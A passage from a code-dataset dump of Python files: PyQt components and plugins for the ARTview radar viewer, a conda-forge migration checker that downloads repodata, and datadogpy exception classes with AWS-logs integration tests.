self.combo0.setCurrentIndex(self.components.index(self.comp0))
self.combo1.setCurrentIndex(self.components.index(self.comp1))
self._setVariables()
self._setRadioButtons()
def _setRadioButtons(self):
'''Add radio buttons for control over the variables.'''
# Radio Buttons
self.radioLayout = QtGui.QGridLayout()
self.layout.addLayout(self.radioLayout, 2, 0)
self.radioLayout.addWidget(QtGui.QLabel("Link"), 0, 1)
self.radioLayout.addWidget(QtGui.QLabel("Unlink"), 0, 2)
self.radioBoxes = []
for idx, var in enumerate(self.variables):
self._addRadioButton(var, idx)
def _addRadioButton(self, var, idx):
'''Add radio button for variable in the given index.'''
radioBox = QtGui.QButtonGroup()
self.radioBoxes.append(radioBox) # avoid garbage collector
link = QtGui.QRadioButton()
unlink = QtGui.QRadioButton()
QtCore.QObject.connect(link, QtCore.SIGNAL("clicked()"),
partial(self.connectVar, var))
QtCore.QObject.connect(unlink, QtCore.SIGNAL("clicked()"),
partial(self.disconnectVar, var))
radioBox.addButton(link)
radioBox.addButton(unlink)
if getattr(self.comp0, var) is getattr(self.comp1, var):
link.setChecked(True)
else:
unlink.setChecked(True)
if self.comp0 is self.comp1:
unlink.setDisabled(True)
self.radioLayout.addWidget(QtGui.QLabel(var[1::]), idx+1, 0)
self.radioLayout.addWidget(link, idx+1, 1)
self.radioLayout.addWidget(unlink, idx+1, 2)
def _comp0Action(self, idx):
'''Update Component 0.'''
self.comp0 = self.components[idx]
self._setVariables()
self._clearLayout(self.radioLayout)
self.layout.removeItem(self.radioLayout)
self._setRadioButtons()
def _comp1Action(self, idx):
'''Update Component 1.'''
self.comp1 = self.components[idx]
self._setVariables()
self._clearLayout(self.radioLayout)
self.layout.removeItem(self.radioLayout)
self._setRadioButtons()
def connectVar(self, var):
'''Assign variable in component 0 to component 1.'''
# Disconect old Variable
self.comp1.disconnectSharedVariable(var)
# comp1.var = comp0.var
setattr(self.comp1, var, getattr(self.comp0, var))
# Connect new Variable
self.comp1.connectSharedVariable(var)
# emit signal
getattr(self.comp1, var).update()
print("connect var %s of %s from %s" % (
var, self.comp1.name, self.comp0.name))
def disconnectVar(self, var):
'''Turn variable in component 1 independente of component 0.'''
# Disconect old Variable
self.comp1.disconnectSharedVariable(var)
# comp1.var = Variable()
setattr(self.comp1, var, Variable())
# Connect new Variable
self.comp1.connectSharedVariable(var)
# emit signal
getattr(self.comp1, var).update()
print("disconnect var %s of %s from %s" % (
var, self.comp1.name, self.comp0.name))
def _clearLayout(self, layout):
'''Recursively remove items from layout.'''
while layout.count():
item = layout.takeAt(0)
widget = item.widget()
if widget is not None:
widget.deleteLater()
else:
self._clearLayout(item.layout())
def _updateComponentList(self, item):
'''Rebuild main layout.'''
self._clearLayout(self.layout)
self.setupUi()
```
#### File: artview/components/field.py
```python
from functools import partial
from ..core import Variable, Component, QtGui, QtCore
class FieldButtonWindow(Component):
'''Class to display a Window with Field name radio buttons.'''
Vradar = None #: see :ref:`shared_variable`
Vfield = None #: see :ref:`shared_variable`
def __init__(self, Vradar=None, Vfield=None, name="FieldButtons",
parent=None):
'''
Initialize the class to create the interface.
Parameters
----------
[Optional]
Vradar : :py:class:`~artview.core.core.Variable` instance
Radar signal variable. If None start new one with None
Vfield : :py:class:`~artview.core.core.Variable` instance
Field signal variable. If None start new one empty string
name : string
Field Radiobutton window name.
parent : PyQt instance
Parent instance to associate to FieldButtonWindow.
If None, then Qt owns, otherwise associated with parent PyQt
instance.
Notes
-----
        This class records the selected button and passes the
        changed value back to the shared variable.
'''
super(FieldButtonWindow, self).__init__(name=name, parent=parent)
# Set up signal, so that DISPLAY can react to external
# (or internal) changes in field (Core.Variable instances expected)
# The change is sent through Vfield
if Vradar is None:
self.Vradar = Variable(None)
else:
self.Vradar = Vradar
if Vfield is None:
self.Vfield = Variable('')
else:
self.Vfield = Vfield
self.sharedVariables = {"Vradar": self.NewRadar,
"Vfield": self.NewField}
self.connectAllVariables()
self.CreateFieldWidget()
self.SetFieldRadioButtons()
self.show()
########################
# Button methods #
########################
def FieldSelectCmd(self, field):
'''Captures a selection and updates field variable.'''
self.Vfield.change(field)
def CreateFieldWidget(self):
'''Create a widget to store radio buttons to control field adjust.'''
self.radioBox = QtGui.QGroupBox("Field Selection", parent=self)
self.rBox_layout = QtGui.QVBoxLayout(self.radioBox)
self.radioBox.setLayout(self.rBox_layout)
self.setCentralWidget(self.radioBox)
def SetFieldRadioButtons(self):
'''Set a field selection using radio buttons.'''
# Instantiate the buttons into a list for future use
self.fieldbutton = {}
if self.Vradar.value is None:
return
# Loop through and create each field button and
# connect a value when selected
for field in self.Vradar.value.fields.keys():
button = QtGui.QRadioButton(field, self.radioBox)
self.fieldbutton[field] = button
QtCore.QObject.connect(button, QtCore.SIGNAL("clicked()"),
partial(self.FieldSelectCmd, field))
self.rBox_layout.addWidget(button)
# set Checked the current field
self.NewField(self.Vfield, self.Vfield.value, True)
def NewField(self, variable, value, strong):
'''Slot for 'ValueChanged' signal of
:py:class:`Vfield <artview.core.core.Variable>`.
This will:
* Update radio check
'''
if (self.Vradar.value is not None and
value in self.Vradar.value.fields):
self.fieldbutton[value].setChecked(True)
def NewRadar(self, variable, value, strong):
'''Slot for 'ValueChanged' signal of
:py:class:`Vradar <artview.core.core.Variable>`.
This will:
* Recreate radio items
'''
self.CreateFieldWidget()
self.SetFieldRadioButtons()
```
#### File: artview/artview/__main__.py
```python
import sys
import os
path = os.path.dirname(sys.modules[__name__].__file__)
path = os.path.join(path, '..')
sys.path.insert(0, path)
import artview
def main(argv):
script, DirIn, filename, field = artview.parser.parse(argv)
if script:
artview.scripts.scripts[script](DirIn, filename, field)
else:
artview.run(DirIn, filename, field)
if __name__ == "__main__":
main(sys.argv)
```
#### File: artview/artview/parser.py
```python
import argparse
import sys
# Get the version
# AG - python 3 decided it doesn't like scripts inside modules.
# I have read some posts about it and no one has a real solution.
# http://stackoverflow.com/questions/16981921/relative-imports-in-python-3
try:
try:
import version
except:
from . import version
VERSION = version.version
except:
import warnings
warnings.warn("No ARTview Version!")
VERSION = 'no version'
NAME = 'ARTview'
def parse(argv):
'''
Parse the input command line.
    Parameters
    ----------
    argv : string
        Input command line string.
    Notes
    -----
    Returns directory and field for initialization.
'''
parser = argparse.ArgumentParser(
description="Start ARTview - the ARM Radar Toolkit Viewer.")
parser.add_argument('-v', '--version', action='version',
version='ARTview version %s' % (VERSION))
# Directory argument now optional
parser.add_argument('-d', '--directory', type=str,
help='directory to open', default='./')
parser.add_argument('-f', '--field', type=str, help='Field to show',
default=None)
parser.add_argument('-F', '--file', type=str, help='File to show',
default=None)
parser.add_argument(
'-s', '--script', type=str,
help='Select from artview.scripts a script to execute', default=None)
# Parse the args
args = parser.parse_args(argv[1::])
return args.script, args.directory, args.file, args.field
```
#### File: artview/plugins/calculate_attenuation.py
```python
from functools import partial
import pyart
import time
from ..core import Component, Variable, common, QtGui, QtCore, VariableChoose
class CalculateAttenuation(Component):
'''
Interface for executing :py:func:`pyart.correct.calculate_attenuation`
'''
Vradar = None #: see :ref:`shared_variable`
@classmethod
def guiStart(self, parent=None):
'''Graphical interface for starting this class'''
kwargs, independent = \
common._SimplePluginStart("CalculateAttenuation").startDisplay()
kwargs['parent'] = parent
return self(**kwargs), independent
def __init__(self, Vradar=None, # Vgatefilter=None,
name="CalculateAttenuation", parent=None):
'''Initialize the class to create the interface.
Parameters
----------
[Optional]
Vradar : :py:class:`~artview.core.core.Variable` instance
Radar signal variable.
A value of None initializes an empty Variable.
name : string
Field Radiobutton window name.
parent : PyQt instance
Parent instance to associate to this class.
If None, then Qt owns, otherwise associated w/ parent PyQt instance
'''
super(CalculateAttenuation, self).__init__(name=name, parent=parent)
self.central_widget = QtGui.QWidget()
self.setCentralWidget(self.central_widget)
self.layout = QtGui.QGridLayout(self.central_widget)
if Vradar is None:
self.Vradar = Variable(None)
else:
self.Vradar = Vradar
self.sharedVariables = {"Vradar": None}
self.connectAllVariables()
self.generalLayout = QtGui.QGridLayout()
self.layout.addLayout(self.generalLayout, 0, 0, 1, 2)
self.helpButton = QtGui.QPushButton("Help")
self.helpButton.clicked.connect(self._displayHelp)
self.layout.addWidget(self.helpButton, 1, 0, 1, 1)
self.button = QtGui.QPushButton("Correct")
self.button.clicked.connect(self.calculate_attenuation)
self.button.setToolTip('Execute pyart.correct.calculate_attenuation')
self.layout.addWidget(self.button, 1, 1, 1, 1)
self.addGeneralOptions()
self.show()
def addGeneralOptions(self):
'''Mount Options Layout.'''
self.radarButton = QtGui.QPushButton("Find Variable")
self.radarButton.clicked.connect(self.chooseRadar)
self.generalLayout.addWidget(QtGui.QLabel("Radar"), 0, 0)
self.generalLayout.addWidget(self.radarButton, 0, 1)
self.zOffset = QtGui.QDoubleSpinBox()
self.zOffset.setRange(-1000, 1000)
self.generalLayout.addWidget(QtGui.QLabel("z_offset"), 1, 0)
self.generalLayout.addWidget(self.zOffset, 1, 1)
self.debug = QtGui.QCheckBox("debug")
self.debug.setChecked(False)
self.generalLayout.addWidget(self.debug, 2, 1)
self.doc = QtGui.QDoubleSpinBox()
self.doc.setRange(-1000, 1000)
self.doc.setValue(15)
self.generalLayout.addWidget(QtGui.QLabel("doc"), 3, 0)
self.generalLayout.addWidget(self.doc, 3, 1)
self.fzl = QtGui.QDoubleSpinBox()
self.fzl.setRange(-100000, 1000000)
self.fzl.setValue(4000)
self.generalLayout.addWidget(QtGui.QLabel("fzl"), 4, 0)
self.generalLayout.addWidget(self.fzl, 4, 1)
self.rhvMin = QtGui.QDoubleSpinBox()
self.rhvMin.setRange(-100000, 1000000)
self.rhvMin.setValue(0.8)
self.generalLayout.addWidget(QtGui.QLabel("rhv_min"), 5, 0)
self.generalLayout.addWidget(self.rhvMin, 5, 1)
self.ncpMin = QtGui.QDoubleSpinBox()
self.ncpMin.setRange(-100000, 1000000)
self.ncpMin.setValue(0.5)
self.generalLayout.addWidget(QtGui.QLabel("ncp_min"), 6, 0)
self.generalLayout.addWidget(self.ncpMin, 6, 1)
self.aCoef = QtGui.QDoubleSpinBox()
self.aCoef.setRange(-100000, 1000000)
self.aCoef.setValue(0.06)
self.generalLayout.addWidget(QtGui.QLabel("a_coef"), 7, 0)
self.generalLayout.addWidget(self.aCoef, 7, 1)
self.beta = QtGui.QDoubleSpinBox()
self.beta.setRange(-100000, 1000000)
self.beta.setValue(0.8)
self.generalLayout.addWidget(QtGui.QLabel("beta"), 8, 0)
self.generalLayout.addWidget(self.beta, 8, 1)
self.reflField = QtGui.QLineEdit("")
self.generalLayout.addWidget(QtGui.QLabel("refl_field"), 9, 0)
self.generalLayout.addWidget(self.reflField, 9, 1)
self.ncpField = QtGui.QLineEdit("")
self.generalLayout.addWidget(QtGui.QLabel("ncp_field"), 10, 0)
self.generalLayout.addWidget(self.ncpField, 10, 1)
self.rhvField = QtGui.QLineEdit("")
self.generalLayout.addWidget(QtGui.QLabel("rhv_field"), 11, 0)
self.generalLayout.addWidget(self.rhvField, 11, 1)
self.phidpField = QtGui.QLineEdit("")
self.generalLayout.addWidget(QtGui.QLabel("phidp_field"), 12, 0)
self.generalLayout.addWidget(self.phidpField, 12, 1)
self.specAtField = QtGui.QLineEdit("")
self.generalLayout.addWidget(QtGui.QLabel("spec_at_field"), 13, 0)
self.generalLayout.addWidget(self.specAtField, 13, 1)
self.corrReflField = QtGui.QLineEdit("")
self.generalLayout.addWidget(QtGui.QLabel("corr_refl_field"), 14, 0)
self.generalLayout.addWidget(self.corrReflField, 14, 1)
def chooseRadar(self):
'''Get Radar with :py:class:`~artview.core.VariableChoose`'''
item = VariableChoose().chooseVariable()
if item is None:
return
else:
self.Vradar = getattr(item[1], item[2])
def _displayHelp(self):
'''Display Py-Art's docstring for help.'''
common.ShowLongText(pyart.correct.calculate_attenuation.__doc__)
def calculate_attenuation(self):
'''Mount Options and execute
:py:func:`~pyart.correct.calculate_attenuation`.
The resulting fields are added to Vradar.
Vradar is updated, strong or weak depending on overwriting old fields.
'''
# test radar
if self.Vradar.value is None:
common.ShowWarning("Radar is None, can not perform correction.")
return
# mount options
args = {
'radar': self.Vradar.value,
'z_offset': self.zOffset.value(),
'debug': self.debug.isChecked(),
'doc': self.doc.value(),
'fzl': self.fzl.value(),
'rhv_min': self.rhvMin.value(),
'ncp_min': self.ncpMin.value(),
'a_coef': self.aCoef.value(),
'beta': self.beta.value(),
'refl_field': [None if a == "" else a for a in (
str(self.reflField.text()),)][0],
'ncp_field': [None if a == "" else a for a in (
str(self.ncpField.text()),)][0],
'rhv_field': [None if a == "" else a for a in (
str(self.rhvField.text()),)][0],
'phidp_field': [None if a == "" else a for a in (
str(self.phidpField.text()),)][0],
'spec_at_field': [None if a == "" else a for a in (
str(self.specAtField.text()),)][0],
'corr_refl_field': [None if a == "" else a for a in (
str(self.corrReflField.text()),)][0],
}
print(args)
# execute
print("Correcting ..")
t0 = time.time()
try:
spec_at, cor_z = pyart.correct.calculate_attenuation(**args)
except:
import traceback
error = traceback.format_exc()
            common.ShowLongText("Py-ART fails with following error\n\n" +
                                error)
            return
t1 = time.time()
print(("Correction took %fs" % (t1-t0)))
# verify field overwriting
if args['spec_at_field'] is None:
spec_at_field_name = "specific_attenuation"
else:
spec_at_field_name = args['spec_at_field']
if args['corr_refl_field'] is None:
corr_refl_field_name = "corrected_reflectivity"
else:
corr_refl_field_name = args['corr_refl_field']
strong_update = False # insertion is weak, overwrite strong
if spec_at_field_name in self.Vradar.value.fields.keys():
resp = common.ShowQuestion(
"Field %s already exists! Do you want to over write it?" %
spec_at_field_name)
if resp != QtGui.QMessageBox.Ok:
return
else:
strong_update = True
if corr_refl_field_name in self.Vradar.value.fields.keys():
resp = common.ShowQuestion(
"Field %s already exists! Do you want to over write it?" %
corr_refl_field_name)
if resp != QtGui.QMessageBox.Ok:
return
else:
strong_update = True
# add fields and update
self.Vradar.value.add_field(spec_at_field_name, spec_at, True)
self.Vradar.value.add_field(corr_refl_field_name, cor_z, True)
self.Vradar.update(strong_update)
print("Correction took %fs" % (t1-t0))
def _clearLayout(self, layout):
'''recursively remove items from layout.'''
while layout.count():
item = layout.takeAt(0)
widget = item.widget()
if widget is not None:
widget.deleteLater()
else:
self._clearLayout(item.layout())
_plugins = [CalculateAttenuation]
```
#### File: artview/plugins/io.py
```python
import code
import pyart
import sys
import os
path = os.path.dirname(sys.modules[__name__].__file__)
path = os.path.join(path, '...')
sys.path.insert(0, path)
import artview
from ..core import Component, Variable, common, QtGui, QtCore, componentsList
# get list of read functions
import inspect
aux_read_functions = inspect.getmembers(pyart.aux_io, inspect.isfunction)
read_functions = [
pyart.io.read,
pyart.io.read_grid,
pyart.io.read_grid_mdv] + [a[1] for a in aux_read_functions]
try:
read_functions.append(pyart.io.read_legacy_grid)
except:
pass
# test for missing dependency
broken_read_functions = []
try:
for func in read_functions:
try:
func(None)
except pyart.exceptions.MissingOptionalDependency:
            broken_read_functions.append(func)
except:
pass
except:
pass
class FileList(Component):
'''
    Display a file list for browsing directories and opening radar or grid files.
'''
Vradar = None #: see :ref:`shared_variable`
Vgrid = None #: see :ref:`shared_variable`
@classmethod
def guiStart(self, parent=None):
'''Graphical interface for starting this class.'''
kwargs, independent = \
common._SimplePluginStart("FileList").startDisplay()
kwargs['parent'] = parent
return self(**kwargs), independent
def __init__(self, dirIn=None, name="FileList", parent=None):
'''Initialize the class to create the interface.
Parameters
----------
[Optional]
dirIn: string
Initial directory path to open.
name : string
Field Radiobutton window name.
parent : PyQt instance
Parent instance to associate to this class.
If None, then Qt owns, otherwise associated with parent PyQt
instance.
'''
super(FileList, self).__init__(name=name, parent=parent)
self.listView = QtGui.QListView()
# set up listView
model = QtGui.QFileSystemModel()
model.setFilter(QtCore.QDir.AllEntries |
QtCore.QDir.AllDirs |
QtCore.QDir.NoDot)
model.setRootPath(QtCore.QDir.currentPath())
self.listView.setModel(model)
if dirIn is None: # avoid reference to path while building doc
dirIn = os.getcwd()
index = model.index(dirIn)
self.listView.setRootIndex(index)
# self.clicked.connect(self.test)
self.listView.doubleClicked.connect(self.doubleClick)
# context (right-click) menu
self.listView.setContextMenuPolicy(QtCore.Qt.CustomContextMenu)
# setup widget
self.setCentralWidget(self.listView)
self.listView.customContextMenuRequested.connect(self.contextMenu)
self.Vradar = Variable(None)
self.Vgrid = Variable(None)
self.sharedVariables = {"Vradar": None,
"Vgrid": None}
self.connectAllVariables()
self.show()
def doubleClick(self, index):
'''Open Directory or File on double click.'''
model = self.listView.model()
indexItem = model.index(index.row(), 0, index.parent())
if model.fileName(indexItem) == '..':
if index.parent().parent().isValid():
self.listView.setRootIndex(index.parent().parent())
elif model.isDir(index):
self.listView.setRootIndex(index)
else:
self.open(model.filePath(indexItem))
def open(self, path):
'''Open file.'''
# try several open
print ("open: %s" % path)
self.filename = str(path)
try:
radar = pyart.io.read(self.filename, delay_field_loading=True)
# Add the filename for Display
radar.filename = self.filename
self.Vradar.change(radar)
return
except:
try:
radar = pyart.io.read(self.filename)
# Add the filename for Display
radar.filename = self.filename
self.Vradar.change(radar)
return
except:
import traceback
print(traceback.format_exc())
radar_warning = True
try:
grid = pyart.io.read_grid(
self.filename, delay_field_loading=True)
self.Vgrid.change(grid)
return
except:
try:
grid = pyart.io.read_grid(self.filename)
self.Vgrid.change(grid)
return
except:
import traceback
print(traceback.format_exc())
grid_warning = True
if grid_warning or radar_warning:
msg = "Py-ART didn't recognize this file!"
common.ShowWarning(msg)
else:
msg = "Could not open file, invalid mode!"
common.ShowWarning(msg)
return
def contextMenu(self, pos):
        '''Construct right-click menu.'''
menu = QtGui.QMenu(self)
index = self.listView.currentIndex()
path = str(self.listView.model().filePath(index))
for func in read_functions:
action = QtGui.QAction("Open with: %s" % func.__name__, self)
# lambda inside loop: problem with variable capturing
            if func not in broken_read_functions:
f = lambda boo, func=func: self.open_with(func, path)
action.triggered.connect(f)
else:
action.setEnabled(False)
menu.addAction(action)
menu.exec_(self.listView.mapToGlobal(pos))
def open_with(self, func, path):
'''Open file using a given function.'''
try:
container = func(path, delay_field_loading=True)
if isinstance(container, pyart.core.Radar):
self.Vradar.change(container)
elif isinstance(container, pyart.core.Grid):
self.Vgrid.change(container)
else:
raise NotImplementedError("Unknown container type %s\n" %
container)
return
except:
import traceback
error = traceback.format_exc()
common.ShowLongText(("Opening file %s with %s fails\n\n" %
(path, func.__name__)) + error)
traceback.format_exc()
_plugins = [FileList]
```
#### File: artview/scripts/_common.py
```python
import os
import pyart
from ..components import (Menu, RadarDisplay, GridDisplay, LinkPlugins,
SelectRegion, PointsDisplay)
from ..core import QtGui, QtCore
def _add_all_advanced_tools(menu):
    # add graphical starts
for comp in [LinkPlugins, RadarDisplay, GridDisplay, SelectRegion]:
action = QtGui.QAction(comp.__name__, menu)
action.triggered[()].connect(
lambda comp=comp: menu.startComponent(comp))
menu.addMenuAction(("Advanced Tools",), action)
    # add all plugins to graphical start
try:
from .. import plugins
for plugin in plugins._plugins.values():
action = QtGui.QAction(plugin.__name__, menu)
action.triggered[()].connect(
lambda plugin=plugin: menu.startComponent(plugin))
menu.addMenuAction(("Advanced Tools",), action)
except:
import traceback
print(traceback.format_exc())
import warnings
warnings.warn("Loading Plugins Fail")
def _parse_dir(DirIn):
if DirIn is None: # avoid reference to path while building documentation
DirIn = os.getcwd()
return DirIn
Zlike = ['CZ', 'DZ', 'AZ', 'Z',
'dbz', 'DBZ', 'dBZ', 'DBZ_S', 'DBZ_K',
'reflectivity_horizontal', 'DBZH', 'corr_reflectivity']
def _parse_field(container, field):
'''
Hack to perform a check on reflectivity to make it work with
    a larger number of files, as there are many nomenclatures in the
weather radar world.
This should only occur upon start up with a new file.
'''
if field is None:
field = pyart.config.get_field_name('reflectivity')
if container is None:
return field
fieldnames = container.fields.keys()
Zinfile = set(fieldnames).intersection(Zlike)
if field not in fieldnames and len(Zinfile) > 0:
field = Zinfile.pop()
return field
def startMainMenu(DirIn=None, filename=None):
MainMenu = Menu(DirIn, filename, mode=("Radar", "Grid"))
for comp in [LinkPlugins, RadarDisplay, GridDisplay, SelectRegion]:
action = QtGui.QAction(comp.__name__, MainMenu)
action.triggered[()].connect(
lambda comp=comp: MainMenu.startComponent(comp))
MainMenu.addMenuAction(("Advanced Tools",), action)
try:
from .. import plugins
for plugin in plugins._plugins.values():
action = QtGui.QAction(plugin.__name__, MainMenu)
action.triggered[()].connect(
lambda plugin=plugin: MainMenu.startComponent(plugin))
MainMenu.addMenuAction(("Advanced Tools",), action)
except:
import warnings
warnings.warn("Loading Plugins Fail")
try:
from ..modes import modes
for mode in modes.keys():
action = QtGui.QAction(mode, MainMenu)
action.triggered[()].connect(
lambda mode=mode: MainMenu.change_mode(modes[mode]))
if mode != 'file_list':
MainMenu.addMenuAction(("Modes",), action)
else:
MainMenu.addMenuAction(("File",), action)
except:
import warnings
warnings.warn("Loading Modes Fail")
    # resize menu
    menu_width = 300
    menu_height = 180
    MainMenu.setGeometry(0, 0, menu_width, menu_height)
    return MainMenu
```
#### File: artview/scripts/_parse_field.py
```python
import pyart
Zlike = ['CZ', 'DZ', 'AZ', 'Z',
'dbz', 'DBZ', 'dBZ', 'DBZ_S', 'DBZ_K',
'reflectivity_horizontal', 'DBZH', 'corr_reflectivity']
def _parse_field(container, field):
'''
Hack to perform a check on reflectivity to make it work with
a larger number of files as there are many nomenclature is the
weather radar world.
This should only occur upon start up with a new file.
'''
if container is None:
return field
fieldnames = container.fields.keys()
Zinfile = set(fieldnames).intersection(Zlike)
if field == pyart.config.get_field_name('reflectivity'):
if field not in fieldnames and len(Zinfile) > 0:
field = Zinfile.pop()
return field
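# Minimal usage sketch (illustrative only; _FakeRadar is a hypothetical
# stand-in for a Py-ART container). If the configured reflectivity name is
# requested but the file only carries one of the Zlike aliases, that alias
# is returned instead:
#
#     class _FakeRadar(object):
#         fields = {'DBZH': None, 'VEL': None}
#
#     _parse_field(_FakeRadar(), pyart.config.get_field_name('reflectivity'))
#     # -> 'DBZH'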
```
#### File: artview/artview/view.py
```python
import os
import pyart
from .core import Variable, QtGui, QtCore
from .components import (
RadarDisplay, GridDisplay, Menu, LinkPlugins, SelectRegion)
from .scripts._common import startMainMenu
app = None
displays = []
MainMenu = None
reflectivity = pyart.config.get_field_name('reflectivity')
def view(containers, field=reflectivity):
'''
Launch ARTview from shell.
Parameters
----------
container : list of :py:class:`~pyart.core.Radar` or \
:py:class:`~pyart.core.Grid` objects
Object to visualise.
field : str
Field to start visualization with.
'''
    # if containers is not iterable, wrap it in a tuple
if not hasattr(containers, '__contains__'):
containers = (containers,)
start()
for container in containers:
if isinstance(container, pyart.core.Radar):
addRadar(container, field)
elif isinstance(container, pyart.core.Grid):
addGrid(container, field)
else:
import warnings
warnings.warn('Ignoring unknown container %s' % container)
execute()
def start():
''' Start Qt Application and :py:class:`~artview.components.Menu` '''
global app
if app is None:
app = QtGui.QApplication([])
global MainMenu
MainMenu = startMainMenu(os.getcwd(), False)
# resize menu
menu_width = 300
menu_height = 180
MainMenu.setGeometry(0, 0, menu_width, menu_height)
def execute():
''' Execute Application '''
global app
app.exec_()
def close():
    ''' Delete all references to allow garbage collection. '''
global displays
displays = []
global MainMenu
MainMenu = None
global app
app = None
def addRadar(radar, field=reflectivity):
'''
add :py:class:`~artview.components.RadarDisplay` to Artview Application.
Parameters
----------
radar : :py:class:`~pyart.core.Radar` object
Object to add to visualisation
field : str
Field to start visualization with
'''
i = len(displays)
displays.append(RadarDisplay(
Variable(radar), Variable(field), Variable(0), name="Display%i" % i,
parent=MainMenu))
def addGrid(grid, field=reflectivity):
'''
add :py:class:`~artview.components.GridDisplay` to Artview Application.
Parameters
----------
grid : :py:class:`~pyart.core.Grid` object
Object to add to visualisation
field : str
Field to start visualization with
'''
i = len(displays)
displays.append(GridDisplay(
Variable(grid), Variable(field), Variable(0), name="Display%i" % i,
parent=MainMenu))
``` |
{
"source": "jjhelmus/conda4aarch64",
"score": 3
} |
#### File: conda4aarch64/tools/check_cf_migration.py
```python
import argparse
import bz2
import json
import os.path
import urllib.request
URL_TEMPLATE = ('https://conda.anaconda.org/{channel}/label/main/'
'{subdir}/repodata.json.bz2')
def repodata_filename(channel, subdir):
fname = f'{channel}_{subdir}_repodata.json.bz2'
return os.path.join('cache', fname)
def get_repodata(channel, subdir):
filename = repodata_filename(channel, subdir)
url = URL_TEMPLATE.format(channel=channel, subdir=subdir)
print("Saving:", filename)
urllib.request.urlretrieve(url, filename=filename)
return
def parse_repodata(channel, subdir):
filename = repodata_filename(channel, subdir)
with bz2.BZ2File(filename, 'r') as bfile:
repodata = json.loads(bfile.read())
packages = repodata['packages']
names = set(pkg['name'] for pkg in packages.values())
return names
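# For reference, the repodata.json payload parsed above has roughly this
# (simplified) shape; the package filenames below are illustrative and only
# the keys used here are shown:
#
#     {
#         "packages": {
#             "numpy-1.16.4-py37h95a1406_0.tar.bz2": {"name": "numpy", ...},
#             "python-3.7.3-h33d41f4_1.tar.bz2": {"name": "python", ...}
#         }
#     }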
def parse_arguments():
parser = argparse.ArgumentParser(
description="List packages not yet migrated to conda-forge")
parser.add_argument(
        '--use_cache', action='store_true', help='use cached repodata')
return parser.parse_args()
def main():
args = parse_arguments()
if not args.use_cache:
get_repodata('c4aarch64', 'linux-aarch64')
get_repodata('c4aarch64', 'noarch')
get_repodata('conda-forge', 'linux-aarch64')
get_repodata('conda-forge', 'noarch')
c4_linux = parse_repodata('c4aarch64', 'linux-aarch64')
c4_noarch = parse_repodata('c4aarch64', 'noarch')
cf_linux = parse_repodata('conda-forge', 'linux-aarch64')
cf_noarch = parse_repodata('conda-forge', 'noarch')
c4_all = c4_linux | c4_noarch
cf_all = cf_linux | cf_noarch
missing = c4_all - cf_all
print("Packages in c4aarch but not conda-forge")
print("---------------------------------------")
for name in sorted(missing):
print(name)
if __name__ == "__main__":
main()
``` |
{
"source": "jjhelmus/datadogpy",
"score": 3
} |
#### File: datadog/api/exceptions.py
```python
class DatadogException(Exception):
"""
Base class for Datadog API exceptions. Use this for patterns like the following:
try:
# do something with the Datadog API
except datadog.api.exceptions.DatadogException:
# handle any Datadog-specific exceptions
"""
class ProxyError(DatadogException):
"""
HTTP connection to the configured proxy server failed.
"""
def __init__(self, method, url, exception):
message = u"Could not request {method} {url}: Unable to connect to proxy. "\
u"Please check the proxy configuration and try again.".format(
method=method, url=url
)
super(ProxyError, self).__init__(message)
class ClientError(DatadogException):
"""
HTTP connection to Datadog endpoint is not possible.
"""
def __init__(self, method, url, exception):
message = u"Could not request {method} {url}: {exception}. "\
u"Please check the network connection or try again later. "\
u"If the problem persists, please contact <EMAIL>".format(
method=method, url=url, exception=exception
)
super(ClientError, self).__init__(message)
class HttpTimeout(DatadogException):
"""
HTTP connection timeout.
"""
def __init__(self, method, url, timeout):
message = u"{method} {url} timed out after {timeout}. "\
u"Please try again later. "\
u"If the problem persists, please contact <EMAIL>".format(
method=method, url=url, timeout=timeout
)
super(HttpTimeout, self).__init__(message)
class HttpBackoff(DatadogException):
"""
Backing off after too many timeouts.
"""
def __init__(self, backoff_period):
message = u"Too many timeouts. Won't try again for {backoff_period} seconds. ".format(
backoff_period=backoff_period)
super(HttpBackoff, self).__init__(message)
class HTTPError(DatadogException):
"""
Datadog returned a HTTP error.
"""
def __init__(self, status_code=None, reason=None):
reason = u" - {reason}".format(reason=reason) if reason else u""
message = u"Datadog returned a bad HTTP response code: {status_code}{reason}. "\
u"Please try again later. "\
u"If the problem persists, please contact <EMAIL>".format(
status_code=status_code,
reason=reason,
)
super(HTTPError, self).__init__(message)
class ApiError(DatadogException):
"""
Datadog returned an API error (known HTTPError).
Matches the following status codes: 400, 401, 403, 404, 409, 429.
"""
class ApiNotInitialized(DatadogException):
"No API key is set"
```
#### File: integration/api/test_aws_logs.py
```python
from datadog import api as dog
from datadog import initialize
from tests.integration.api.constants import API_KEY, APP_KEY, API_HOST
TEST_ACCOUNT_ID = "123456789101"
TEST_ROLE_NAME = "DatadogApiTestRole"
TEST_LAMBDA_ARN = "arn:aws:lambda:us-east-1:123456789101:function:APITest"
AVAILABLE_SERVICES = 6
class TestAwsLogsIntegration:
@classmethod
def setup_class(cls):
""" setup any state specific to the execution of the given class.
"""
initialize(api_key=API_KEY, app_key=APP_KEY, api_host=API_HOST)
dog.AwsIntegration.create(
account_id=TEST_ACCOUNT_ID,
role_name=TEST_ROLE_NAME
)
@classmethod
def teardown_class(cls):
""" teardown any state that was previously setup with a setup_method
call.
"""
dog.AwsIntegration.delete(account_id=TEST_ACCOUNT_ID, role_name=TEST_ROLE_NAME)
def test_list_log_services(self):
output = dog.AwsLogsIntegration.list_log_services()
assert len(output) >= AVAILABLE_SERVICES
def test_aws_logs_crud(self):
add_lambda_arn_output = dog.AwsLogsIntegration.add_log_lambda_arn(
account_id=TEST_ACCOUNT_ID,
lambda_arn=TEST_LAMBDA_ARN
)
assert add_lambda_arn_output == {}
save_services_output = dog.AwsLogsIntegration.save_services(
account_id=TEST_ACCOUNT_ID,
services=["s3", "elb", "elbv2", "cloudfront", "redshift", "lambda"]
)
assert save_services_output == {}
list_output = dog.AwsLogsIntegration.list()
expected_fields = [
'services',
'lambdas',
'account_id'
]
assert all(k in list_output[0].keys() for k in expected_fields)
delete_output = dog.AwsLogsIntegration.delete_config(
account_id=TEST_ACCOUNT_ID,
lambda_arn=TEST_LAMBDA_ARN
)
assert delete_output == {}
def test_check_lambda(self):
output = dog.AwsLogsIntegration.check_lambda(
account_id=TEST_ACCOUNT_ID,
lambda_arn=TEST_LAMBDA_ARN
)
assert 'status' in output.keys()
def test_check_services(self):
output = dog.AwsLogsIntegration.check_services(
account_id=TEST_ACCOUNT_ID,
services=["s3", "elb", "elbv2", "cloudfront", "redshift", "lambda"]
)
assert 'status' in output.keys()
``` |
{
